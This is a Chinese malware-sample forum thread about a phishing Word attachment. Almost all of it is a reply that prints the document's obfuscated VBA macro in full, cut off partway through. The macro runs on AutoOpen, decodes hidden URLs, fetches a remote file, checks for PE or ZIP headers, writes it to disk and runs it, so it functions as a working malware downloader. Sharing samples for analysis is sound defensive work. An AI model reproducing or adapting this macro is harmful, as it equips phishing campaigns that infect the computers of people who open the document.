楼主: wwwab
收起左侧

[病毒样本] 样本 1X 恶意doc 邮箱附件钓鱼(无损,原文件)

[复制链接]
biue
发表于 2023-3-12 21:42:58 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
python无名氏
发表于 2023-3-13 21:12:53 | 显示全部楼层
本帖最后由 python无名氏 于 2023-3-13 21:19 编辑

宏代码:
  1. Function qjo() As String

  2.     Dim TTasNV As String
  3.     Dim Mq As String

  4.     Dim S As String
  5. Dim T As String
  6. Dim GodRdbqT(6) As Long
  7. Dim Kd As Long
  8. Kd = 4
  9. T = "iNWQoGnzhTIBWtyDazZytjjySdGKzhePk"
  10. GodRdbqT(0) = 32
  11. GodRdbqT(1) = 17
  12. GodRdbqT(2) = 14
  13. GodRdbqT(3) = 9
  14. GodRdbqT(4) = 18
  15. GodRdbqT(5) = 7
  16. S = pr(T, GodRdbqT, Kd)
  17.     Dim XnMmSpp As String
  18. Dim eViLHotB As String
  19. Dim qJE(2) As Long
  20. Dim rvikv As Long
  21. rvikv = 1
  22. eViLHotB = "\jLty"
  23. qJE(0) = 1
  24. qJE(1) = 1
  25. XnMmSpp = pr(eViLHotB, qJE, rvikv)

  26.     TTasNV = CallByName(ActiveDocument, S, 2)
  27.     Mq = u()

  28.     qjo = TTasNV & XnMmSpp & Mq

  29. End Function


  30. Sub tgqU(QVpE As Object, exr As String, NoyLu As String)

  31.     Dim dXB As String
  32. Dim Q As String
  33. Dim sBN(2) As Long
  34. Dim ehApA As Long
  35. ehApA = 1
  36. Q = "MwRc qZHW"
  37. sBN(0) = 5
  38. sBN(1) = 2
  39. dXB = pr(Q, sBN, ehApA)

  40.     Dim H As String
  41. Dim g As String
  42. Dim gHP(14) As Long
  43. Dim SPp As Long
  44. SPp = 12
  45. g = "nOZDZFIaVmglaaNoeyExPEnZXYWReguVjEWfihSpeGeUxccozlQriNSItdalOZnclsaQUxNjAblKfqJn"
  46. gHP(0) = 39
  47. gHP(1) = 38
  48. gHP(2) = 17
  49. gHP(3) = 12
  50. gHP(4) = 12
  51. gHP(5) = 19
  52. gHP(6) = 20
  53. gHP(7) = 17
  54. gHP(8) = 46
  55. gHP(9) = 31
  56. gHP(10) = 57
  57. gHP(11) = 17
  58. gHP(12) = 11
  59. gHP(13) = 57
  60. H = pr(g, gHP, SPp)

  61.     CallByName QVpE, H, 1, exr, dXB & NoyLu

  62. End Sub


  63. Function LPNiApw(uKMiltMb As String) As Object

  64.     Set LPNiApw = CreateObject(uKMiltMb)

  65. End Function


  66. Sub QCSHsGFQ(SiI As String)
  67.     Dim B As Object
  68.     Dim Tgz As String

  69.     Dim FVCQqdnn As String
  70. Dim eYPZs As String
  71. Dim jS(21) As Long
  72. Dim MKteON As Long
  73. MKteON = 12
  74. eYPZs = "PpYUctzvHTjULh.mSScPkJGeafZSRdrzLNYPyPuuRHKJxNHeVtroXUgqC3UewKsfAPHdhDGWReZKgCcegRiIRicPL2jphmIglkIG"
  75. jS(0) = 31
  76. jS(1) = 24
  77. jS(2) = 55
  78. jS(3) = 63
  79. jS(4) = 8
  80. jS(5) = 31
  81. jS(6) = 58
  82. jS(7) = 90
  83. jS(8) = 15
  84. jS(9) = 24
  85. jS(10) = 45
  86. jS(11) = 24
  87. jS(12) = 94
  88. jS(13) = 84
  89. jS(14) = 67
  90. jS(15) = 39
  91. jS(16) = 6
  92. jS(17) = 33
  93. jS(18) = 22
  94. jS(19) = 87
  95. jS(20) = 88
  96. FVCQqdnn = pr(eYPZs, jS, MKteON)
  97.     Dim TRekaKlY As String
  98. Dim lGJwmxH As String
  99. Dim NV(9) As Long
  100. Dim VwAg As Long
  101. VwAg = 3
  102. lGJwmxH = "xYqRND/ kojtOghwisFsIY"
  103. NV(0) = 7
  104. NV(1) = 18
  105. NV(2) = 8
  106. NV(3) = 3
  107. NV(4) = 22
  108. NV(5) = 10
  109. NV(6) = 18
  110. NV(7) = 7
  111. NV(8) = 9
  112. TRekaKlY = pr(lGJwmxH, NV, VwAg)

  113.     Tgz = """"

  114.     TRekaKlY = TRekaKlY & Tgz
  115.     TRekaKlY = TRekaKlY & SiI
  116.     TRekaKlY = TRekaKlY & Tgz

  117.     Set B = VTcbvVF()

  118.     tgqU B, FVCQqdnn, TRekaKlY

  119. End Sub


  120. Sub CjT(lrea As Object, SiI As String)

  121.     Dim KOQvuzm As String
  122. Dim tMbh As String
  123. Dim zqZA(31) As Long
  124. Dim Fr As Long
  125. Fr = 12
  126. tMbh = "wvXfPdrCmtOMLdDhSdMNeWYXHamxOXOlyUwmDeEeUuDAINaEyxFSpDzknrnFVPJWelclxMpkYmdPWTlMoteZFcKZRDtEaMecvZogB"
  127. zqZA(0) = 15
  128. zqZA(1) = 21
  129. zqZA(2) = 32
  130. zqZA(3) = 21
  131. zqZA(4) = 10
  132. zqZA(5) = 21
  133. zqZA(6) = 51
  134. zqZA(7) = 81
  135. zqZA(8) = 32
  136. zqZA(9) = 6
  137. zqZA(10) = 21
  138. zqZA(11) = 7
  139. zqZA(12) = 99
  140. zqZA(13) = 93
  141. zqZA(14) = 42
  142. zqZA(15) = 12
  143. zqZA(16) = 10
  144. zqZA(17) = 7
  145. zqZA(18) = 6
  146. zqZA(19) = 18
  147. zqZA(20) = 78
  148. zqZA(21) = 38
  149. zqZA(22) = 37
  150. zqZA(23) = 39
  151. zqZA(24) = 97
  152. zqZA(25) = 94
  153. zqZA(26) = 34
  154. zqZA(27) = 66
  155. zqZA(28) = 37
  156. zqZA(29) = 73
  157. zqZA(30) = 88
  158. KOQvuzm = pr(tMbh, zqZA, Fr)

  159.     CallByName lrea, KOQvuzm, 1, SiI

  160. End Sub


  161. Function aNZKxNaj(CXWA() As Byte) As Integer

  162.     aNZKxNaj = 0

  163.     If UBound(CXWA) > 1 Then
  164.         If CXWA(0) = 77 And CXWA(1) = 90 Then
  165.             aNZKxNaj = 1
  166.         End If

  167.         If CXWA(0) = 80 And CXWA(1) = 75 Then
  168.             aNZKxNaj = 2
  169.         End If
  170.     End If

  171. End Function


  172. Sub LBKrarO(HZRXwXl As Object, rrJkYLep As String)

  173.     Dim Kvuu As String
  174. Dim ufZfxPwO As String
  175. Dim QI(7) As Long
  176. Dim E As Long
  177. E = 4
  178. ufZfxPwO = "enepXkcDOdGv"
  179. QI(0) = 9
  180. QI(1) = 4
  181. QI(2) = 1
  182. QI(3) = 2
  183. QI(4) = 8
  184. QI(5) = 11
  185. QI(6) = 5
  186. Kvuu = pr(ufZfxPwO, QI, E)

  187.     Dim LkZ As String
  188. Dim aVBsHW As String
  189. Dim zshR(8) As Long
  190. Dim SREgVBU As Long
  191. SREgVBU = 3
  192. aVBsHW = "ElDeEqkTGIaHOKruKvyxuZXD"
  193. zshR(0) = 9
  194. zshR(1) = 1
  195. zshR(2) = 8
  196. zshR(3) = 15
  197. zshR(4) = 18
  198. zshR(5) = 13
  199. zshR(6) = 3
  200. zshR(7) = 13
  201. LkZ = pr(aVBsHW, zshR, SREgVBU)

  202.     CallByName HZRXwXl, Kvuu, 1, LkZ, rrJkYLep, False

  203. End Sub


  204. Sub AFnjkvGv(BhSUcUN As Object)

  205.     Dim GgyNoPp As String
  206. Dim npxvfjLC As String
  207. Dim UdEpO(5) As Long
  208. Dim Ar As Long
  209. Ar = 4
  210. npxvfjLC = "eTcuPuulhLXEpKPOyIKn"
  211. UdEpO(0) = 2
  212. UdEpO(1) = 17
  213. UdEpO(2) = 13
  214. UdEpO(3) = 1
  215. UdEpO(4) = 9
  216. GgyNoPp = pr(npxvfjLC, UdEpO, Ar)

  217.     CallByName BhSUcUN, GgyNoPp, 4, 1

  218. End Sub


  219. Function u() As String

  220.     Dim WeVkIMjh As String
  221. Dim I As String
  222. Dim vkjXD(17) As Long
  223. Dim YbNpXXgO As Long
  224. YbNpXXgO = 6
  225. I = "EusFmXmpNhWEYCwTfshxhtdgOThPylvSMwWhS"
  226. vkjXD(0) = 10
  227. vkjXD(1) = 10
  228. vkjXD(2) = 5
  229. vkjXD(3) = 5
  230. vkjXD(4) = 3
  231. vkjXD(5) = 3
  232. vkjXD(6) = 33
  233. vkjXD(7) = 29
  234. vkjXD(8) = 12
  235. vkjXD(9) = 25
  236. vkjXD(10) = 18
  237. vkjXD(11) = 12
  238. vkjXD(12) = 23
  239. vkjXD(13) = 28
  240. vkjXD(14) = 18
  241. vkjXD(15) = 12
  242. vkjXD(16) = 8
  243. WeVkIMjh = pr(I, vkjXD, YbNpXXgO)

  244.     eR = Now()

  245.     u = Format(eR, WeVkIMjh)

  246. End Function


  247. Function zHKj() As Object

  248.     Dim a As String
  249. Dim lWIGbwa As String
  250. Dim oUQwIXw(26) As Long
  251. Dim evSH As Long
  252. evSH = 12
  253. lWIGbwa = "SOFsZeRsdtNsmHNMUkYJHPOOdUZDFTOthpycDppVYOYfumYZjvidL.kYrhdvBvOodHNzFaAMdabWquWFdcsXmmKqFkXaf"
  254. oUQwIXw(0) = 71
  255. oUQwIXw(1) = 28
  256. oUQwIXw(2) = 2
  257. oUQwIXw(3) = 28
  258. oUQwIXw(4) = 61
  259. oUQwIXw(5) = 54
  260. oUQwIXw(6) = 1
  261. oUQwIXw(7) = 10
  262. oUQwIXw(8) = 57
  263. oUQwIXw(9) = 6
  264. oUQwIXw(10) = 70
  265. oUQwIXw(11) = 13
  266. oUQwIXw(12) = 35
  267. oUQwIXw(13) = 35
  268. oUQwIXw(14) = 55
  269. oUQwIXw(15) = 44
  270. oUQwIXw(16) = 38
  271. oUQwIXw(17) = 1
  272. oUQwIXw(18) = 38
  273. oUQwIXw(19) = 0
  274. oUQwIXw(20) = 9
  275. oUQwIXw(21) = 65
  276. oUQwIXw(22) = 37
  277. oUQwIXw(23) = 43
  278. oUQwIXw(24) = 75
  279. oUQwIXw(25) = 75
  280. a = pr(lWIGbwa, oUQwIXw, evSH)

  281.     Set zHKj = LPNiApw(a)

  282. End Function


  283. Function gIbhZ(HZRXwXl As Object) As String

  284.     Dim IzQuGkDG As String
  285. Dim YvRr As String
  286. Dim mAvaWKD(27) As Long
  287. Dim HVSeJtm As Long
  288. HVSeJtm = 12
  289. YvRr = "tRGnAuXxDSCobLUiUroryxMKjVQOBZoveQMBUTEgnVEkqUkszpxedwgrsNzmGXFyqRezuJlNLKGQYQtasyspMUsvMWIkl"
  290. mAvaWKD(0) = 18
  291. mAvaWKD(1) = 33
  292. mAvaWKD(2) = 48
  293. mAvaWKD(3) = 50
  294. mAvaWKD(4) = 12
  295. mAvaWKD(5) = 4
  296. mAvaWKD(6) = 48
  297. mAvaWKD(7) = 33
  298. mAvaWKD(8) = 29
  299. mAvaWKD(9) = 12
  300. mAvaWKD(10) = 53
  301. mAvaWKD(11) = 21
  302. mAvaWKD(12) = 2
  303. mAvaWKD(13) = 21
  304. mAvaWKD(14) = 6
  305. mAvaWKD(15) = 42
  306. mAvaWKD(16) = 26
  307. mAvaWKD(17) = 84
  308. mAvaWKD(18) = 37
  309. mAvaWKD(19) = 3
  310. mAvaWKD(20) = 52
  311. mAvaWKD(21) = 72
  312. mAvaWKD(22) = 85
  313. mAvaWKD(23) = 57
  314. mAvaWKD(24) = 80
  315. mAvaWKD(25) = 40
  316. mAvaWKD(26) = 91
  317. IzQuGkDG = pr(YvRr, mAvaWKD, HVSeJtm)

  318.     gIbhZ = CallByName(HZRXwXl, IzQuGkDG, 2)

  319. End Function


  320. Sub oblIkmg(BhSUcUN As Object)

  321.     Dim FUtq As String
  322. Dim EOeFdPKu As String
  323. Dim FV(14) As Long
  324. Dim WI As Long
  325. WI = 5
  326. EOeFdPKu = "MxYLwPSIsSoICbfLBqqFRAsZdQvKkseJAoeBKwlogOdK"
  327. FV(0) = 13
  328. FV(1) = 39
  329. FV(2) = 11
  330. FV(3) = 9
  331. FV(4) = 31
  332. FV(5) = 14
  333. FV(6) = 5
  334. FV(7) = 21
  335. FV(8) = 36
  336. FV(9) = 7
  337. FV(10) = 2
  338. FV(11) = 35
  339. FV(12) = 38
  340. FV(13) = 5
  341. FUtq = pr(EOeFdPKu, FV, WI)

  342.     CallByName BhSUcUN, FUtq, 1

  343. End Sub


  344. Sub tN(HZRXwXl As Object)

  345.     Dim AeNV As String
  346. Dim Vytwqme As String
  347. Dim nLKP(5) As Long
  348. Dim NGZzoyBl As Long
  349. NGZzoyBl = 4
  350. Vytwqme = "bljLafISYnadaefIIF"
  351. nLKP(0) = 8
  352. nLKP(1) = 14
  353. nLKP(2) = 10
  354. nLKP(3) = 12
  355. nLKP(4) = 7
  356. AeNV = pr(Vytwqme, nLKP, NGZzoyBl)

  357.     CallByName HZRXwXl, AeNV, 1

  358. End Sub


  359. Sub pJyZ(BhSUcUN As Object, SiI As String)

  360.     Dim RjzlnoaY As String
  361. Dim IPHxmUNg As String
  362. Dim ig(15) As Long
  363. Dim IPlVU As Long
  364. IPlVU = 10
  365. IPHxmUNg = "kmKneLlaWaevReVWHkSTCTCrBfcFWvhJoATipzvgsifb"
  366. ig(0) = 19
  367. ig(1) = 8
  368. ig(2) = 12
  369. ig(3) = 5
  370. ig(4) = 20
  371. ig(5) = 33
  372. ig(6) = 28
  373. ig(7) = 36
  374. ig(8) = 7
  375. ig(9) = 5
  376. ig(10) = 1
  377. ig(11) = 23
  378. ig(12) = 4
  379. ig(13) = 9
  380. ig(14) = 29
  381. RjzlnoaY = pr(IPHxmUNg, ig, IPlVU)

  382.     CallByName BhSUcUN, RjzlnoaY, 1, SiI, 2

  383. End Sub


  384. Function LaILj(QVpE As Object, SiI As String) As Object

  385.     Dim oEeMt As Variant

  386.     Dim j As String
  387. Dim hLQMPf As String
  388. Dim xJj(20) As Long
  389. Dim pohwIMfg As Long
  390. pohwIMfg = 9
  391. hLQMPf = "yjRgigUpJNSpncNkaXqkoptscacSkeADjBmeaM"
  392. xJj(0) = 10
  393. xJj(1) = 17
  394. xJj(2) = 35
  395. xJj(3) = 30
  396. xJj(4) = 24
  397. xJj(5) = 8
  398. xJj(6) = 17
  399. xJj(7) = 14
  400. xJj(8) = 30
  401. xJj(9) = 29
  402. xJj(10) = 14
  403. xJj(11) = 8
  404. xJj(12) = 1
  405. xJj(13) = 19
  406. xJj(14) = 9
  407. xJj(15) = 35
  408. xJj(16) = 8
  409. xJj(17) = 14
  410. xJj(18) = 35
  411. xJj(19) = 28
  412. j = pr(hLQMPf, xJj, pohwIMfg)

  413.     oEeMt = CVar(SiI)

  414.     Set LaILj = CallByName(QVpE, j, 1, oEeMt)

  415. End Function


  416. Sub TdkwXDaK(BhSUcUN As Object, zvNMkVJ() As Byte)

  417.     Dim zijYwwOE As String
  418. Dim TDy As String
  419. Dim mpIDSa(14) As Long
  420. Dim hkRqOf As Long
  421. hkRqOf = 5
  422. TDy = "VSLjstsrWeeuViYbyGjBt"
  423. mpIDSa(0) = 9
  424. mpIDSa(1) = 8
  425. mpIDSa(2) = 14
  426. mpIDSa(3) = 6
  427. mpIDSa(4) = 10
  428. mpIDSa(5) = 9
  429. mpIDSa(6) = 11
  430. mpIDSa(7) = 17
  431. mpIDSa(8) = 6
  432. mpIDSa(9) = 9
  433. mpIDSa(10) = 10
  434. mpIDSa(11) = 11
  435. mpIDSa(12) = 9
  436. mpIDSa(13) = 1
  437. zijYwwOE = pr(TDy, mpIDSa, hkRqOf)

  438.     CallByName BhSUcUN, zijYwwOE, 1, zvNMkVJ

  439. End Sub


  440. Function Z() As Object

  441.     Dim ZhYAx As String
  442. Dim iEu As String
  443. Dim odjPC(27) As Long
  444. Dim X As Long
  445. X = 26
  446. iEu = "DEQuSQbxlCsxfflwiSLuzIWCMsjwcqcpCiFycbSosNNeEwDAPHRxE.VuLIOClurQdsQsinQZNwxpnptQigWHtBFNPOZRngtUHqUfiJgfLbYvIMCRHEAiKinPLcVFJwjeXTBOtqWGekmVkWohRxCyINGmCyRmeiHkywttOwsvrqJiGCIDneTElivIxvHcxSnxLElwRImOJegjnlVmycsRzpwinFoYbpqgfsNpJozN"
  447. odjPC(0) = 5
  448. odjPC(1) = 29
  449. odjPC(2) = 63
  450. odjPC(3) = 17
  451. odjPC(4) = 32
  452. odjPC(5) = 79
  453. odjPC(6) = 17
  454. odjPC(7) = 70
  455. odjPC(8) = 82
  456. odjPC(9) = 54
  457. odjPC(10) = 35
  458. odjPC(11) = 17
  459. odjPC(12) = 9
  460. odjPC(13) = 44
  461. odjPC(14) = 5
  462. odjPC(15) = 36
  463. odjPC(16) = 11
  464. odjPC(17) = 79
  465. odjPC(18) = 44
  466. odjPC(19) = 139
  467. odjPC(20) = 59
  468. odjPC(21) = 7
  469. odjPC(22) = 27
  470. odjPC(23) = 44
  471. odjPC(24) = 29
  472. odjPC(25) = 79
  473. odjPC(26) = 25
  474. ZhYAx = pr(iEu, odjPC, X)

  475.     Set Z = LPNiApw(ZhYAx)

  476. End Function


  477. Sub AutoOpen()

  478.     Dim CbZSwqt As String

  479.     Dim VRSXo As String
  480. Dim WnI As String
  481. Dim NlbijK(97) As Long
  482. Dim QbRASf As Long
  483. QbRASf = 37
  484. WnI = "rCySAhaKzt/_SbKC:oiGsdEZNoXYHRthHnraW/TYrkpTqgZpbYnY.vTahcpZsNbicUeTNd/WqGIdSBRHuvqFrsutbvoeAAjDBwhSHDWCxxFNitnEHamuUAXYeAghxYRbhbdRRKEopZk/pfHchfcmheO/GtoGYHbkHCBuUWXvSZD-skmQisXklmJBptgljaozosqbbibmjJFbDpIpDKXnkucepGzfVeL9PmewepqFnYiKTWdSBmTj2aKNvYHdr"
  485. NlbijK(0) = 6
  486. NlbijK(1) = 10
  487. NlbijK(2) = 10
  488. NlbijK(3) = 43
  489. NlbijK(4) = 21
  490. NlbijK(5) = 17
  491. NlbijK(6) = 11
  492. NlbijK(7) = 11
  493. NlbijK(8) = 7
  494. NlbijK(9) = 21
  495. NlbijK(10) = 172
  496. NlbijK(11) = 7
  497. NlbijK(12) = 81
  498. NlbijK(13) = 10
  499. NlbijK(14) = 18
  500. NlbijK(15) = 53
  501. NlbijK(16) = 21
  502. NlbijK(17) = 81
  503. NlbijK(18) = 11
  504. NlbijK(19) = 67
  505. NlbijK(20) = 21
  506. NlbijK(21) = 6
  507. NlbijK(22) = 18
  508. NlbijK(23) = 43
  509. NlbijK(24) = 12
  510. NlbijK(25) = 7
  511. NlbijK(26) = 43
  512. NlbijK(27) = 43
  513. NlbijK(28) = 11
  514. NlbijK(29) = 29
  515. NlbijK(30) = 29
  516. NlbijK(31) = 245
  517. NlbijK(32) = 95
  518. NlbijK(33) = 224
  519. NlbijK(34) = 4
  520. NlbijK(35) = 29
  521. NlbijK(36) = 11
  522. NlbijK(37) = 24
  523. NlbijK(38) = 153
  524. NlbijK(39) = 227
  525. NlbijK(40) = 229
  526. NlbijK(41) = 238
  527. NlbijK(42) = 10
  528. NlbijK(43) = 232
  529. NlbijK(44) = 173
  530. NlbijK(45) = 60
  531. NlbijK(46) = 163
  532. NlbijK(47) = 28
  533. NlbijK(48) = 106
  534. NlbijK(49) = 178
  535. NlbijK(50) = 53
  536. NlbijK(51) = 46
  537. NlbijK(52) = 15
  538. NlbijK(53) = 181
  539. NlbijK(54) = 222
  540. NlbijK(55) = 48
  541. NlbijK(56) = 161
  542. NlbijK(57) = 140
  543. NlbijK(58) = 246
  544. NlbijK(59) = 47
  545. NlbijK(60) = 61
  546. NlbijK(61) = 126
  547. NlbijK(62) = 150
  548. NlbijK(63) = 244
  549. NlbijK(64) = 155
  550. NlbijK(65) = 209
  551. NlbijK(66) = 241
  552. NlbijK(67) = 139
  553. NlbijK(68) = 140
  554. NlbijK(69) = 181
  555. NlbijK(70) = 82
  556. NlbijK(71) = 41
  557. NlbijK(72) = 56
  558. NlbijK(73) = 11
  559. NlbijK(74) = 253
  560. NlbijK(75) = 114
  561. NlbijK(76) = 168
  562. NlbijK(77) = 62
  563. NlbijK(78) = 170
  564. NlbijK(79) = 166
  565. NlbijK(80) = 253
  566. NlbijK(81) = 181
  567. NlbijK(82) = 242
  568. NlbijK(83) = 11
  569. NlbijK(84) = 86
  570. NlbijK(85) = 59
  571. NlbijK(86) = 155
  572. NlbijK(87) = 183
  573. NlbijK(88) = 104
  574. NlbijK(89) = 230
  575. NlbijK(90) = 196
  576. NlbijK(91) = 110
  577. NlbijK(92) = 177
  578. NlbijK(93) = 139
  579. NlbijK(94) = 186
  580. NlbijK(95) = 250
  581. NlbijK(96) = 6
  582. VRSXo = pr(WnI, NlbijK, QbRASf)
  583. Dim jKE As String
  584. Dim qCnoq As String
  585. Dim wk(93) As Long
  586. Dim BCCpKE As Long
  587. BCCpKE = 38
  588. qCnoq = "lqrWfrNYhsalICDPzLqtabKIuVo/SiajrNGeeeoYo/SONLoaeqg5nhLJAeJtrWrWrrJK7JEPXCggQrPUeMgmrUZAvUdjbstEXOrxvJtlY0/kLX/KGQmrQlzO.SrrEDoGzOLJYDBAutQDSZMWFzOgstHbpNcEeuZmiTSROpNuRZyefy:KzWiNKssjyWseVFKCPpGaSdgGHSGDKVvrVcyHGXEjvsKvHCPOJpAcGlIHS/xxiFwxsGIEqtXtJpBfc"
  589. wk(0) = 9
  590. wk(1) = 20
  591. wk(2) = 20
  592. wk(3) = 153
  593. wk(4) = 175
  594. wk(5) = 28
  595. wk(6) = 28
  596. wk(7) = 11
  597. wk(8) = 3
  598. wk(9) = 1
  599. wk(10) = 36
  600. wk(11) = 100
  601. wk(12) = 121
  602. wk(13) = 10
  603. wk(14) = 25
  604. wk(15) = 28
  605. wk(16) = 10
  606. wk(17) = 36
  607. wk(18) = 3
  608. wk(19) = 89
  609. wk(20) = 30
  610. wk(21) = 155
  611. wk(22) = 36
  612. wk(23) = 10
  613. wk(24) = 28
  614. wk(25) = 4
  615. wk(26) = 29
  616. wk(27) = 100
  617. wk(28) = 56
  618. wk(29) = 52
  619. wk(30) = 106
  620. wk(31) = 7
  621. wk(32) = 153
  622. wk(33) = 44
  623. wk(34) = 89
  624. wk(35) = 69
  625. wk(36) = 4
  626. wk(37) = 28
  627. wk(38) = 111
  628. wk(39) = 93
  629. wk(40) = 207
  630. wk(41) = 211
  631. wk(42) = 170
  632. wk(43) = 191
  633. wk(44) = 128
  634. wk(45) = 48
  635. wk(46) = 167
  636. wk(47) = 202
  637. wk(48) = 43
  638. wk(49) = 115
  639. wk(50) = 78
  640. wk(51) = 181
  641. wk(52) = 39
  642. wk(53) = 103
  643. wk(54) = 90
  644. wk(55) = 163
  645. wk(56) = 244
  646. wk(57) = 253
  647. wk(58) = 164
  648. wk(59) = 153
  649. wk(60) = 80
  650. wk(61) = 231
  651. wk(62) = 151
  652. wk(63) = 251
  653. wk(64) = 188
  654. wk(65) = 51
  655. wk(66) = 171
  656. wk(67) = 41
  657. wk(68) = 218
  658. wk(69) = 132
  659. wk(70) = 81
  660. wk(71) = 56
  661. wk(72) = 208
  662. wk(73) = 111
  663. wk(74) = 30
  664. wk(75) = 2
  665. wk(76) = 245
  666. wk(77) = 117
  667. wk(78) = 59
  668. wk(79) = 190
  669. wk(80) = 93
  670. wk(81) = 1
  671. wk(82) = 178
  672. wk(83) = 216
  673. wk(84) = 103
  674. wk(85) = 109
  675. wk(86) = 199
  676. wk(87) = 89
  677. wk(88) = 99
  678. wk(89) = 158
  679. wk(90) = 76
  680. wk(91) = 176
  681. wk(92) = 146
  682. jKE = pr(qCnoq, wk, BCCpKE)
  683. Dim yYUzJZ As String
  684. Dim ftjFT As String
  685. Dim QaR(64) As Long
  686. Dim uTC As Long
  687. uTC = 34
  688. ftjFT = "NfuY.tbnrHUgtCAEvBiapDVnrJTeQQksUNvwAnOfddSYtHmTGxtL:eYVAbUzpeLARefKBwDFuueQrFqb/Nhpa/exLXeTVjkbzk/RgLigm/xhLBgssrRlwajqK/GbeOxcGobLatytXZNTqQPfnnpoxZNoiDLrl"
  689. QaR(0) = 83
  690. QaR(1) = 6
  691. QaR(2) = 6
  692. QaR(3) = 21
  693. QaR(4) = 32
  694. QaR(5) = 53
  695. QaR(6) = 81
  696. QaR(7) = 81
  697. QaR(8) = 36
  698. QaR(9) = 20
  699. QaR(10) = 8
  700. QaR(11) = 41
  701. QaR(12) = 47
  702. QaR(13) = 20
  703. QaR(14) = 32
  704. QaR(15) = 6
  705. QaR(16) = 28
  706. QaR(17) = 9
  707. QaR(18) = 5
  708. QaR(19) = 8
  709. QaR(20) = 28
  710. QaR(21) = 6
  711. QaR(22) = 81
  712. QaR(23) = 7
  713. QaR(24) = 19
  714. QaR(25) = 6
  715. QaR(26) = 9
  716. QaR(27) = 19
  717. QaR(28) = 50
  718. QaR(29) = 81
  719. QaR(30) = 72
  720. QaR(31) = 52
  721. QaR(32) = 50
  722. QaR(33) = 81
  723. QaR(34) = 122
  724. QaR(35) = 44
  725. QaR(36) = 99
  726. QaR(37) = 6
  727. QaR(38) = 117
  728. QaR(39) = 125
  729. QaR(40) = 122
  730. QaR(41) = 35
  731. QaR(42) = 111
  732. QaR(43) = 126
  733. QaR(44) = 68
  734. QaR(45) = 154
  735. QaR(46) = 107
  736. QaR(47) = 98
  737. QaR(48) = 4
  738. QaR(49) = 145
  739. QaR(50) = 9
  740. QaR(51) = 81
  741. QaR(52) = 108
  742. QaR(53) = 121
  743. QaR(54) = 78
  744. QaR(55) = 27
  745. QaR(56) = 106
  746. QaR(57) = 150
  747. QaR(58) = 144
  748. QaR(59) = 96
  749. QaR(60) = 4
  750. QaR(61) = 37
  751. QaR(62) = 7
  752. QaR(63) = 47
  753. yYUzJZ = pr(ftjFT, QaR, uTC)
  754. Dim DXWzKLjH As String
  755. Dim xLO As String
  756. Dim w(52) As Long
  757. Dim dQj As Long
  758. dQj = 44
  759. xLO = "UKziUSVOratib.CqEjXOWcftWKjizPYrGVd/poR/oywowYahnrcttuFtyjtgFfnFUxAcj/TeagXDuUKqjjtkBCHFewDJCxLjVBLIwoVCZkxaOGCpyhcjFtnXHnVvwS:sXDKwcEUUqrnNbNqwQG.yLnJOvFVyLemCofFHGAFfQJoqVMMakhGsqAtZivtAuczZBOsEsPUpetHJNjpPxzfmxtNSySECWrqORgHKYVOXtpphbqXwoRUTmYMLqs/XjdKOeMJrGjZvqzZWeQJzgpEbvpCkzKLdiDoPNYQxcNjMGgqMIGOKXbZnGOyCWbkdTZhcusGASKCfOqBGZj/LAf"
  760. w(0) = 48
  761. w(1) = 11
  762. w(2) = 11
  763. w(3) = 37
  764. w(4) = 127
  765. w(5) = 36
  766. w(6) = 36
  767. w(7) = 43
  768. w(8) = 43
  769. w(9) = 43
  770. w(10) = 14
  771. w(11) = 60
  772. w(12) = 10
  773. w(13) = 9
  774. w(14) = 9
  775. w(15) = 72
  776. w(16) = 11
  777. w(17) = 11
  778. w(18) = 14
  779. w(19) = 84
  780. w(20) = 3
  781. w(21) = 36
  782. w(22) = 23
  783. w(23) = 10
  784. w(24) = 16
  785. w(25) = 36
  786. w(26) = 8
  787. w(27) = 49
  788. w(28) = 72
  789. w(29) = 16
  790. w(30) = 66
  791. w(31) = 95
  792. w(32) = 49
  793. w(33) = 15
  794. w(34) = 55
  795. w(35) = 39
  796. w(36) = 60
  797. w(37) = 11
  798. w(38) = 4
  799. w(39) = 8
  800. w(40) = 19
  801. w(41) = 38
  802. w(42) = 38
  803. w(43) = 36
  804. w(44) = 260
  805. w(45) = 289
  806. w(46) = 149
  807. w(47) = 97
  808. w(48) = 337
  809. w(49) = 332
  810. w(50) = 12
  811. w(51) = 311
  812. DXWzKLjH = pr(xLO, w, dQj)
  813. Dim PJFGr As String
  814. Dim ITzmrW As String
  815. Dim mbhdyUmq(49) As Long
  816. Dim HAtmQd As Long
  817. HAtmQd = 45
  818. ITzmrW = "MwaQQxxKNNziULHsIlR1ejOrbP.NbuXDpTrJozIIwuglifXsfTdakWWePmiULZIWbIQANMddUTauNDnRVyVynDUhnhPyl/teexGCyNCSrmxSQfAWjPqmddWIElEKomwYHvWCpJVEbcrdjKnsHVdllKRPWiYKRcnKBRZindQuAwXPFqtLfiSByuFpmchdlsYeobzWrsDcRouUgFq:PlJhYExCOVZzSTKJQluncaQcrbrMViIhZgxVDf4nxUePZtjYXxM2XmoWdtPepFCnrCpyD/hpJaXfbKzplbLkKTdfSpejTxuzNlqnlVeDVkqDauPfUOTQSaPzjuhQbd/kQnuIFFePDjHXEo/VJSeZeNLihEtMzMuBt/NIZMo"
  819. mbhdyUmq(0) = 88
  820. mbhdyUmq(1) = 95
  821. mbhdyUmq(2) = 95
  822. mbhdyUmq(3) = 33
  823. mbhdyUmq(4) = 208
  824. mbhdyUmq(5) = 94
  825. mbhdyUmq(6) = 94
  826. mbhdyUmq(7) = 58
  827. mbhdyUmq(8) = 21
  828. mbhdyUmq(9) = 3
  829. mbhdyUmq(10) = 18
  830. mbhdyUmq(11) = 30
  831. mbhdyUmq(12) = 6
  832. mbhdyUmq(13) = 27
  833. mbhdyUmq(14) = 25
  834. mbhdyUmq(15) = 82
  835. mbhdyUmq(16) = 94
  836. mbhdyUmq(17) = 33
  837. mbhdyUmq(18) = 21
  838. mbhdyUmq(19) = 24
  839. mbhdyUmq(20) = 16
  840. mbhdyUmq(21) = 37
  841. mbhdyUmq(22) = 79
  842. mbhdyUmq(23) = 3
  843. mbhdyUmq(24) = 18
  844. mbhdyUmq(25) = 94
  845. mbhdyUmq(26) = 12
  846. mbhdyUmq(27) = 260
  847. mbhdyUmq(28) = 18
  848. mbhdyUmq(29) = 247
  849. mbhdyUmq(30) = 32
  850. mbhdyUmq(31) = 14
  851. mbhdyUmq(32) = 128
  852. mbhdyUmq(33) = 34
  853. mbhdyUmq(34) = 4
  854. mbhdyUmq(35) = 68
  855. mbhdyUmq(36) = 88
  856. mbhdyUmq(37) = 88
  857. mbhdyUmq(38) = 20
